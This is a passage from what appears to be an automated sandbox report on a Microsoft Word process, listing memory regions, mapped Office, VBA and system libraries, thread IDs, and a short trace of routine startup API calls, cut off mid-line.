Region: id = 399 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 400 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 401 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 402 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 403 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 404 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 405 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 406 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 407 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 408 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 409 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 410 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 411 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 412 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 413 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 414 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 415 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 416 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 417 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 418 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 419 start_va = 0x29a0000 end_va = 0x2a1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029a0000" filename = "" Region: id = 420 start_va = 0x2cf0000 end_va = 0x2d6ffff entry_point = 0x2cf0000 region_type = mapped_file name = "~df934350a80202b001.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~DF934350A80202B001.TMP" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~df934350a80202b001.tmp") Region: id = 421 start_va = 0x4470000 end_va = 0x456ffff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 422 start_va = 0x7fee40e0000 end_va = 0x7fee450dfff entry_point = 0x7fee40e0000 region_type = mapped_file name = "gkword.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GKWord.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\gkword.dll") Region: id = 423 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 424 start_va = 0x3e0000 end_va = 0x3e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 425 start_va = 0x74f30000 end_va = 0x75001fff entry_point = 0x74f30000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcr100.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcr100.dll") Region: id = 426 start_va = 0x7fee3bd0000 end_va = 0x7fee3c89fff entry_point = 0x7fee3bd0000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 427 start_va = 0x7fee3c90000 end_va = 0x7fee40d7fff entry_point = 0x7fee3c90000 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 428 start_va = 0x7fef3840000 end_va = 0x7fef3893fff entry_point = 0x7fef3840000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 429 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x3f0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 430 start_va = 0x2590000 end_va = 0x2591fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 431 start_va = 0x25a0000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 432 start_va = 0x25b0000 end_va = 0x25b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 433 start_va = 0x2a20000 end_va = 0x2a30fff entry_point = 0x2a20000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 434 start_va = 0x8360000 end_va = 0x845ffff entry_point = 0x0 region_type = private name = "private_0x0000000008360000" filename = "" Region: id = 435 start_va = 0x7fee3750000 end_va = 0x7fee3bc8fff entry_point = 0x7fee3750000 region_type = mapped_file name = "gfx.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GFX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\gfx.dll") Region: id = 436 start_va = 0x7fef79c0000 end_va = 0x7fef79c6fff entry_point = 0x7fef79c0000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 437 start_va = 0x2c80000 end_va = 0x2c80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c80000" filename = "" Region: id = 438 start_va = 0x69b0000 end_va = 0x6a5dfff entry_point = 0x69b0000 region_type = mapped_file name = "cour.ttf" filename = "\\Windows\\Fonts\\cour.ttf" (normalized: "c:\\windows\\fonts\\cour.ttf") Region: id = 439 start_va = 0x84f0000 end_va = 0x85b6fff entry_point = 0x84f0000 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 440 start_va = 0xad40000 end_va = 0xb53ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ad40000" filename = "" Region: id = 441 start_va = 0xb540000 end_va = 0xb8f1fff entry_point = 0x0 region_type = private name = "private_0x000000000b540000" filename = "" Region: id = 442 start_va = 0x7fef82d0000 end_va = 0x7fef82dbfff entry_point = 0x7fef82d0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 443 start_va = 0x7fef8d70000 end_va = 0x7fef8deffff entry_point = 0x7fef8d70000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 444 start_va = 0x7fef8e70000 end_va = 0x7fef8e7efff entry_point = 0x7fef8e70000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 445 start_va = 0x7fefb0d0000 end_va = 0x7fefb0dafff entry_point = 0x7fefb0d0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 446 start_va = 0x7fefd430000 end_va = 0x7fefd4c0fff entry_point = 0x7fefd430000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 447 start_va = 0xb900000 end_va = 0xb9e2fff entry_point = 0xb900000 region_type = mapped_file name = "msword.olb" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSWORD.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msword.olb") Region: id = 448 start_va = 0xb9f0000 end_va = 0xbc81fff entry_point = 0xb9f0000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 449 start_va = 0xb9f0000 end_va = 0xbc81fff entry_point = 0xb9f0000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 450 start_va = 0x7fee34b0000 end_va = 0x7fee374dfff entry_point = 0x7fee34b0000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 451 start_va = 0x2cb0000 end_va = 0x2cb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002cb0000" filename = "" Region: id = 452 start_va = 0x2d70000 end_va = 0x2d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 453 start_va = 0x7fef89d0000 end_va = 0x7fef89f5fff entry_point = 0x7fef89d0000 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 454 start_va = 0x2d80000 end_va = 0x2d89fff entry_point = 0x2d80000 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 455 start_va = 0x2d90000 end_va = 0x2d90fff entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 456 start_va = 0x2da0000 end_va = 0x2da0fff entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 457 start_va = 0x5270000 end_va = 0x52effff entry_point = 0x5270000 region_type = mapped_file name = "~wrf{9c0629f7-bd47-4d0c-88d4-c421e61b46b2}.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{9C0629F7-BD47-4D0C-88D4-C421E61B46B2}.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{9c0629f7-bd47-4d0c-88d4-c421e61b46b2}.tmp") Region: id = 458 start_va = 0xb9f0000 end_va = 0xc9effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b9f0000" filename = "" Region: id = 459 start_va = 0x2db0000 end_va = 0x2deffff entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 460 start_va = 0x2df0000 end_va = 0x2df2fff entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 461 start_va = 0x2e00000 end_va = 0x2e03fff entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 462 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 463 start_va = 0x30a0000 end_va = 0x30a0fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 464 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 465 start_va = 0x30c0000 end_va = 0x30c7fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 466 start_va = 0x3300000 end_va = 0x333ffff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 467 start_va = 0x30d0000 end_va = 0x30d2fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 468 start_va = 0x3160000 end_va = 0x316bfff entry_point = 0x3160000 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 469 start_va = 0x3170000 end_va = 0x3173fff entry_point = 0x3170000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 470 start_va = 0x57d0000 end_va = 0x5855fff entry_point = 0x57d0000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 471 start_va = 0x3340000 end_va = 0x3343fff entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 472 start_va = 0x33d0000 end_va = 0x33d3fff entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 473 start_va = 0x33f0000 end_va = 0x33f2fff entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 474 start_va = 0x3900000 end_va = 0x3907fff entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 475 start_va = 0x3910000 end_va = 0x394ffff entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 476 start_va = 0x3950000 end_va = 0x3952fff entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 477 start_va = 0x3960000 end_va = 0x396dfff entry_point = 0x3960000 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 478 start_va = 0x3af0000 end_va = 0x3af3fff entry_point = 0x0 region_type = private name = "private_0x0000000003af0000" filename = "" Region: id = 479 start_va = 0xcbd0000 end_va = 0xcccffff entry_point = 0x0 region_type = private name = "private_0x000000000cbd0000" filename = "" Region: id = 480 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 481 start_va = 0x3b00000 end_va = 0x3b03fff entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 482 start_va = 0x3b10000 end_va = 0x3b13fff entry_point = 0x0 region_type = private name = "private_0x0000000003b10000" filename = "" Region: id = 483 start_va = 0x40d0000 end_va = 0x40d3fff entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 484 start_va = 0x40e0000 end_va = 0x40e3fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 485 start_va = 0x40f0000 end_va = 0x40f3fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 486 start_va = 0x7fef30e0000 end_va = 0x7fef3107fff entry_point = 0x7fef30e0000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 487 start_va = 0x7fefad90000 end_va = 0x7fefada7fff entry_point = 0x7fefad90000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 488 start_va = 0x7fee4540000 end_va = 0x7fee4573fff entry_point = 0x7fee4540000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 489 start_va = 0x4200000 end_va = 0x4213fff entry_point = 0x4200000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 490 start_va = 0xc9f0000 end_va = 0xcaeffff entry_point = 0x0 region_type = private name = "private_0x000000000c9f0000" filename = "" Region: id = 491 start_va = 0x7fefa5e0000 end_va = 0x7fefa636fff entry_point = 0x7fefa5e0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 492 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 493 start_va = 0x7fef38a0000 end_va = 0x7fef4456fff entry_point = 0x7fef38a0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 504 start_va = 0x4220000 end_va = 0x4221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004220000" filename = "" Region: id = 505 start_va = 0x4230000 end_va = 0x4233fff entry_point = 0x4230000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 506 start_va = 0x4240000 end_va = 0x4243fff entry_point = 0x4240000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 507 start_va = 0x4570000 end_va = 0x459ffff entry_point = 0x4570000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 508 start_va = 0x5550000 end_va = 0x55b5fff entry_point = 0x5550000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 598 start_va = 0x4250000 end_va = 0x4251fff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 599 start_va = 0x4460000 end_va = 0x4460fff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 600 start_va = 0x5500000 end_va = 0x5501fff entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 601 start_va = 0x5520000 end_va = 0x5521fff entry_point = 0x0 region_type = private name = "private_0x0000000005520000" filename = "" Region: id = 602 start_va = 0x55c0000 end_va = 0x55c1fff entry_point = 0x0 region_type = private name = "private_0x00000000055c0000" filename = "" Region: id = 603 start_va = 0x5880000 end_va = 0x5881fff entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 604 start_va = 0x59a0000 end_va = 0x59a1fff entry_point = 0x0 region_type = private name = "private_0x00000000059a0000" filename = "" Region: id = 605 start_va = 0x59c0000 end_va = 0x59c1fff entry_point = 0x0 region_type = private name = "private_0x00000000059c0000" filename = "" Region: id = 606 start_va = 0x59e0000 end_va = 0x59e1fff entry_point = 0x0 region_type = private name = "private_0x00000000059e0000" filename = "" Region: id = 607 start_va = 0x5a00000 end_va = 0x5a01fff entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 608 start_va = 0x6450000 end_va = 0x6451fff entry_point = 0x0 region_type = private name = "private_0x0000000006450000" filename = "" Region: id = 609 start_va = 0x85c0000 end_va = 0x8679fff entry_point = 0x85c0000 region_type = mapped_file name = "calibril.ttf" filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf") Region: id = 610 start_va = 0xc9f0000 end_va = 0xcabbfff entry_point = 0xc9f0000 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 611 start_va = 0xcac0000 end_va = 0xcb8dfff entry_point = 0xcac0000 region_type = mapped_file name = "timesbd.ttf" filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf") Region: id = 612 start_va = 0xccd0000 end_va = 0xcda4fff entry_point = 0xccd0000 region_type = mapped_file name = "calibrili.ttf" filename = "\\Windows\\Fonts\\CalibriLI.ttf" (normalized: "c:\\windows\\fonts\\calibrili.ttf") Region: id = 613 start_va = 0xcdb0000 end_va = 0xce80fff entry_point = 0xcdb0000 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 614 start_va = 0x7fef30b0000 end_va = 0x7fef30d2fff entry_point = 0x7fef30b0000 region_type = mapped_file name = "officevoicemanager.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\officevoicemanager.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\officevoicemanager.dll") Region: id = 633 start_va = 0x4200000 end_va = 0x4200fff entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 634 start_va = 0xce90000 end_va = 0xde5ffff entry_point = 0x0 region_type = private name = "private_0x000000000ce90000" filename = "" Region: id = 635 start_va = 0xdf30000 end_va = 0xdff9fff entry_point = 0x0 region_type = private name = "private_0x000000000df30000" filename = "" Region: id = 636 start_va = 0xe210000 end_va = 0xe30ffff entry_point = 0x0 region_type = private name = "private_0x000000000e210000" filename = "" Region: id = 637 start_va = 0x7fee1bd0000 end_va = 0x7fee1c25fff entry_point = 0x7fee1bd0000 region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msproof7.dll") Region: id = 704 start_va = 0xb540000 end_va = 0xb8cafff entry_point = 0x0 region_type = private name = "private_0x000000000b540000" filename = "" Region: id = 705 start_va = 0x7fefcbb0000 end_va = 0x7fefcc06fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 706 start_va = 0x4210000 end_va = 0x4211fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004210000" filename = "" Region: id = 707 start_va = 0x54f0000 end_va = 0x54f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054f0000" filename = "" Region: id = 708 start_va = 0xe060000 end_va = 0xe15ffff entry_point = 0x0 region_type = private name = "private_0x000000000e060000" filename = "" Region: id = 709 start_va = 0x7fefc8b0000 end_va = 0x7fefc8cafff entry_point = 0x7fefc8b0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 710 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 994 start_va = 0x7fede500000 end_va = 0x7fede61efff entry_point = 0x7fede500000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 4653 start_va = 0x2b40000 end_va = 0x2b44fff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 4654 start_va = 0x2b60000 end_va = 0x2b60fff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 4655 start_va = 0x2b70000 end_va = 0x2b70fff entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 4656 start_va = 0x2b80000 end_va = 0x2b80fff entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 4657 start_va = 0x2b90000 end_va = 0x2b90fff entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 4658 start_va = 0x6780000 end_va = 0x687ffff entry_point = 0x0 region_type = private name = "private_0x0000000006780000" filename = "" Region: id = 4659 start_va = 0xe320000 end_va = 0xe41ffff entry_point = 0x0 region_type = private name = "private_0x000000000e320000" filename = "" Region: id = 4660 start_va = 0xe490000 end_va = 0xe58ffff entry_point = 0x0 region_type = private name = "private_0x000000000e490000" filename = "" Region: id = 4661 start_va = 0x33f0000 end_va = 0x34a6fff entry_point = 0x33f0000 region_type = mapped_file name = "arialbd.ttf" filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf") Region: id = 4662 start_va = 0x29a0000 end_va = 0x29a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029a0000" filename = "" Region: id = 4663 start_va = 0x7fef8b30000 end_va = 0x7fef8b9dfff entry_point = 0x7fef8b30000 region_type = mapped_file name = "mso.frameprotocolwin32.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSO.FRAMEPROTOCOLWIN32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mso.frameprotocolwin32.dll") Thread: id = 1 os_tid = 0x9e0 Thread: id = 2 os_tid = 0x9c0 Thread: id = 3 os_tid = 0x9bc Thread: id = 4 os_tid = 0x9b8 Thread: id = 5 os_tid = 0x9b4 Thread: id = 6 os_tid = 0x9b0 Thread: id = 7 os_tid = 0x9ac Thread: id = 8 os_tid = 0x9a8 Thread: id = 9 os_tid = 0x9a4 Thread: id = 10 os_tid = 0x9a0 Thread: id = 11 os_tid = 0x99c Thread: id = 12 os_tid = 0x998 Thread: id = 13 os_tid = 0x994 Thread: id = 14 os_tid = 0x990 Thread: id = 15 os_tid = 0x98c Thread: id = 16 os_tid = 0x988 Thread: id = 17 os_tid = 0x984 Thread: id = 18 os_tid = 0x964 Thread: id = 19 os_tid = 0x960 Thread: id = 20 os_tid = 0x95c Thread: id = 21 os_tid = 0x958 Thread: id = 22 os_tid = 0x954 Thread: id = 23 os_tid = 0x94c [0041.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2002f0 | out: lpSystemTimeAsFileTime=0x2002f0*(dwLowDateTime=0xc250c990, dwHighDateTime=0x1d4be3a)) [0041.269] GetCurrentProcessId () returned 0x948 [0041.269] GetCurrentThreadId () returned 0x94c [0041.269] GetTickCount () returned 0x1a459 [0041.269] QueryPerformanceCounter (in: lpPerformanceCount=0x2002f8 | out: lpPerformanceCount=0x2002f8*=1811864100000) returned 1 [0041.272] __dllonexit () returned 0xb2a723d0000007fe [0041.272] __dllonexit () returned 0xb2a70fb4000007fe [0041.274] __dllonexit () returned 0xb2a70c98000007fe [0041.275] __dllonexit () returned 0xb2a71344000007fe [0041.276] __dllonexit () returned 0xb2a70cc0000007fe [0041.276] __dllonexit () returned 0xb2a70c20000007fe [0041.276] __dllonexit () returned 0xb2a70c00000007fe [0041.277] __dllonexit () returned 0xb2a70c60000007fe [0041.277] __dllonexit () returned 0xb2a70c40000007fe [0041.277] __dllonexit () returned 0xb2a70da0000007fe [0041.278] __dllonexit () returned 0xb2a70d80000007fe [0041.278] __dllonexit () returned 0xb2a70de0000007fe [0041.279] __dllonexit () returned 0xb2a70dc0000007fe [0041.279] __dllonexit () returned 0xb2a70d20000007fe [0041.279] __dllonexit () returned 0xb2a70d00000007fe [0041.280] __dllonexit () returned 0xb2a70d60000007fe [0041.280] __dllonexit () returned 0xb2a70d40000007fe [0041.280] __dllonexit () returned 0xb2a70170000007fe [0041.281] __dllonexit () returned 0xb2a72300000007fe [0041.282] __dllonexit () returned 0xb2a72370000007fe [0041.282] 